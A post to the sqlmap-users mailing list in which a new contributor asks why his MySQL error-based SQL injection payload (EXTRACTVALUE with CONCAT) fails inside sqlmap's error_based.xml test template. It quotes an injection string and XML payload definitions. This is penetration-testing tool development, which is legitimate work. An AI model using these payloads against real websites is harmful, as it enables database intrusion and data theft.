Hi all, this is my first time sending an e-mail to the list =)

My name is Daniel, and I'm new to contributing to the project.

I'm trying to implement this kind of payload for the error-based method for MySQL, 
but I'm having some problems.

The payload I want to implement is:

file.php?id=1 and extractvalue(0x0a,concat(0x0a,(query)))--+

I know that 0x0a is the "ENTER", but it can be changed for other chars, so I 
replaced it with ':', which would be 0x3a.

I found the error_based.xml file, and I tried some modifications, but it keeps 
not giving the expected results. I'm trying it like this:

<test>
<title>MySQL &gt;= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)</title>
<stype>2</stype>
<level>2</level>
<risk>1</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND EXTRACTVALUE(':',CONCAT(':',([QUERY])))</vector>
<request>
<!-- These work as good as ELT(), but are longer
<payload>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
<payload>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>
-->
<payload>and extractvalue(0x3a,concat(':',(select '[DELIMITER_STOP]')))</payload>
</request>
<response>
<grep>':'(?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt;= 5.1</dbms_version>
</details>
</test>

And I don't want to test for WHERE, HAVING or ORDER BY... just with AND.

Sorry for my bad English, I hope you can understand =)

best regards,

daniel.
github.com/chr0n1c




_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
